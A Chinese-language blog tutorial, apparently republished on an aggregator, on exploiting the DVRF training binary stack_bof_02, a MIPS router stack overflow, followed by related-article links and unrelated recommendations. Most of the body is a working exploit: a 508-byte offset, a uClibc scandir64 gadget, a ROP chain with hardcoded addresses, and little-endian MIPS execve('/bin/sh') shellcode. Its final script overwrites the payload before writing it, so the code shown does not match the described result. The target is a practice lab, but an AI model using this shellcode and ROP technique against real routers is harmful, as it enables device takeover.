一步一步pwn路由器之rop技术实战
前言
本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274
这次程序也是 DVRF 里面的,他的路径是 pwnable/ShellCode_Required/stack_bof_02 , 同样是一个简单的栈溢出,不过这个程序里面没有提供 getshell 的函数,需要我们执行shellcode来实现。这个正好实战下前文: 一步一步pwn路由器之路由器环境修复&&rop技术分析,中分析的在mips下的通用的rop技术。
正文
首先使用 qemu 运行目标程序,并等待 gdb 来调试。
sudo chroot . ./qemu-mipsel-static -g 1234 ./pwnable/ShellCode_Required/stack_bof_02 "`cat ./pwnable/Intro/input`"
使用pwntools的 cyclic 功能,找到偏移

验证一下:
payload = "A" * 508 + 'B' * 4
with open("input", "wb") as f:
f.write(payload)

OK, 现在我们已经可以控制程序的 $pc寄存器了,下一步就是利用的方法了。使用前文的那个 rop 链,我们需要可以控制 $s1寄存器。但是这里我们并没有办法控制。不过在 这里提到,在 uclibc 的 scandir 或者 scandir64 的函数末尾有一个 gadgets 可以操控几乎所有寄存器。
.text:0000AFE0 lw $ra, 0x40+var_4($sp)
.text:0000AFE4 lw $fp, 0x40+var_8($sp)
.text:0000AFE8 lw $s7, 0x40+var_C($sp)
.text:0000AFEC lw $s6, 0x40+var_10($sp)
.text:0000AFF0 lw $s5, 0x40+var_14($sp)
.text:0000AFF4 lw $s4, 0x40+var_18($sp)
.text:0000AFF8 lw $s3, 0x40+var_1C($sp)
.text:0000AFFC lw $s2, 0x40+var_20($sp)
.text:0000B000 lw $s1, 0x40+var_24($sp)
.text:0000B004 lw $s0, 0x40+var_28($sp)
.text:0000B008 jr $ra
.text:0000B00C addiu $sp, 0x40
.text:0000B00C # End of function scandir64
于是利用的思路就很明确了。首先使用这段 rop gadgets 设置好寄存器,然后进入前文所说的 rop 链中执行。
最后的poc如下:
#!/usr/bin/python
from pwn import *
context.endian = "little"
context.arch = "mips"
payload = ""
# NOP sled (XOR $t0, $t0, $t0; as NOP is only null bytes)
for i in range(30):
payload += "\x26\x40\x08\x01"
# execve shellcode translated from MIPS to MIPSEL
# http://shell-storm.org/shellcode/files/shellcode-792.php
payload += "\xff\xff\x06\x28" # slti $a2, $zero, -1
payload += "\x62\x69\x0f\x3c" # lui $t7, 0x6962
payload += "\x2f\x2f\xef\x35" # ori $t7, $t7, 0x2f2f
payload += "\xf4\xff\xaf\xaf" # sw $t7, -0xc($sp)
payload += "\x73\x68\x0e\x3c" # lui $t6, 0x6873
payload += "\x6e\x2f\xce\x35" # ori $t6, $t6, 0x2f6e
payload += "\xf8\xff\xae\xaf" # sw $t6, -8($sp)
payload += "\xfc\xff\xa0\xaf" # sw $zero, -4($sp)
payload += "\xf4\xff\xa4\x27" # addiu $a0, $sp, -0xc
payload += "\xff\xff\x05\x28" # slti $a1, $zero, -1
payload += "\xab\x0f\x02\x24" # addiu;$v0, $zero, 0xfab
payload += "\x0c\x01\x01\x01" # syscall 0x40404
shellcode = payload
padding = "O" * 508
payload = padding
payload += p32(0x766effe0)
payload += 'B' * 0x18
payload += 'A' * 4 # $s0
payload += p32(0x7670303c) # $s1
payload += 'A' * 4 # $s2
payload += 'A' * 4 # $s3
payload += 'A' * 4 # $s4
payload += 'A' * 4 # $s5
payload += 'A' * 4 # $s6
payload += 'A' * 4 # $s7
payload += 'A' * 4 # $fp
payload += p32(0x76714b10) # $ra for jmp
# stack for gadget 2
payload += 'B' * 0x18
payload += 'A' * 4 # $s0
payload += p32(0x0002F2B0 + 0x766e5000) # $s1
payload += 'A' * 4 # $s2
payload += p32(0x766fbdd0) # $ra
# stack for gadget 2 for second
payload += 'B' * 0x18
payload += p32(0x767064a0) # $s0 for jmp stack
payload += p32(0x0002F2B0 + 0x766e5000) # $s1
payload += 'A' * 4 # $s2
payload += p32(0x766fbdd0) # $ra for get stack addr
# stack for shellcode
payload += shellcode
payload = "A" * 508 + 'B' * 4
with open("input", "wb") as f:
f.write(payload)
# base 0x766e5000
可以执行完毕 shellcode , 不过执行完后就异常了。神奇。
总结
在调试rop时可以先在调试器中修改寄存器,内存数据来模拟实现,然后在写到脚本里面。
参考链接:
https://www.pnfsoftware.com/blog/firmware-exploitation-with-jeb-part-2/
一步一步pwn路由器之rop技术实战的更多相关文章
- 一步一步pwn路由器之radare2使用实战
前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 前文讲了一些 radare2 的特性相关的操作方法.本文以一个 c ...
- 一步一步pwn路由器之wr940栈溢出漏洞分析与利用
前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 这个是最近爆出来的漏洞,漏洞编号:CVE-2017-13772 固 ...
- CTF必备技能丨Linux Pwn入门教程——ROP技术(下)
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程. 教程仅针对i386/am ...
- CTF必备技能丨Linux Pwn入门教程——ROP技术(上)
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程. 教程仅针对i386/am ...
- 一步一步pwn路由器之路由器环境修复&&rop技术分析
前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 拿到路由器的固件后,第一时间肯定是去运行目标程序,一般是web服务 ...
- 一步一步pwn路由器之环境搭建
前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 正式进入路由器的世界了.感觉路由器这块就是固件提取,运行环境修复比 ...
- 一步一步pwn路由器之radare2使用全解
前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 radare2 最近越来越流行,已经进入 github 前 25了 ...
- 一步一步pwn路由器之栈溢出实战
前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 本文以 DVRF 中的第一个漏洞程序 stack_bof_01 为 ...
- 一步一步pwn路由器之uClibc中malloc&&free分析
前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 栈溢出告一段落.本文介绍下 uClibc 中的 malloc 和 ...
随机推荐
- jmeter边界提取器实现数据依赖
前言:没用cookie管理器去管理cookie是因为它自动匹配的cookie不对 1.已登录接口为案例,查询接口需要依赖登录后返回的cookie 2.首先调登录接口 可以看到 响应头里面返回了一串co ...
- Python进入后台界面(admin)设定
前言 用过Django框架的童鞋肯定都知道,在创建完Django项目后,每个app下,都会有一个urls.py文件,里边会有如下几行: ※特别要注意下面标红颜色的部分[] 一般情况下不需要修改什么东西 ...
- 乐字节Java变量与数据类型之一:Java编程规范,关键字与标识符
大家好,我是乐字节的小乐,这次要给大家带来的是Java变量与数据类型.本文是第一集:Java编程规范,关键字与标识符. 一.编程规范 任何地方的名字都需要见名知意: 代码适当缩进 书写过程成对编程 对 ...
- 【转帖】Linux 内核系统架构
Linux 内核系统架构 描述Linux内核的文章已经有上亿字了 但是对于初学者,还是应该多学习多看,毕竟上亿字不能一下子就明白的. 即使看了所有的Linux 内核文章,估计也还不是很明白,这时候 ...
- 图数据库neo4j添加算法包
1. 从https://github.com/neo4j-contrib/neo4j-graph-algorithms/releases下载相应版本jar包,放到 C:\Users\Administr ...
- Python豆瓣源镜像
pip install pymysql -i http://pypi.douban.com/simple --trusted-host pypi.douban.com
- springboot整合thymeleaf——引用静态资源
原html src="/css/index.css" thymeleaf中,th:src="@{/css/index.css}"
- C++中如何记录程序运行时间
一.clock()计时函数clock()是C/C++中的计时函数,而与其相关的数据类型是clock_t.在MSDN中,查得对clock函数定义如下:clock_t clock(void) ;简单而言, ...
- 十一、三星平台framebuffer驱动
和总线设备驱动模型类似,framebuffer分为核心层.驱动层和设备层. 核心层:就是上一章分析的fbmem.c文件 驱动层(控制器层):一般由芯片原厂提供,实现了LCD控制器通用的操作接口和配置接 ...
- atomikos 优化JDBC性能
JDBC performance comes for free with our pooling DataSource classes: AtomikosDataSourceBean for XA-e ...